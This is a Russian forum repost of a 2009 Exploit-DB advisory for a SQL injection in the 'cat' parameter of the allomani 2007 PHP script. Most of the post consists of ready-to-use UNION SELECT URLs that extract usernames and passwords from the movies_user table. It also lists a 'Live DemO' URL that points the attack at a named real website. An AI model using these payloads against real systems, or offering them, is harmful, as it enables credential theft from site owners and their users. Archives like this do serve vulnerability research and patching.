Exploit allomani 2007 - 'cat' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9532
Проверка EDB
  1. Пройдено
Автор
NEX HACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-08-26
Код:
==================

NaMe: allomani 2007  <= SQL Injection Vulnerability
Author : NeX HackEr
Contact: [email protected]

==================

Script site : http://allomani.com

==================

ExplOiT:

 UserName

http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user

 Password


http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user

 :) 

==================

Live DemO:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user



+========================================================+
|                                                                                   
| Greetz.: ~ alMaFiA ~ RmZ AlJnooP ~ GaBsH ~                                          
|               And All Friends!!!!                      
+========================================================+

# milw0rm.com [2009-08-26]
 
Источник
www.exploit-db.com

Похожие темы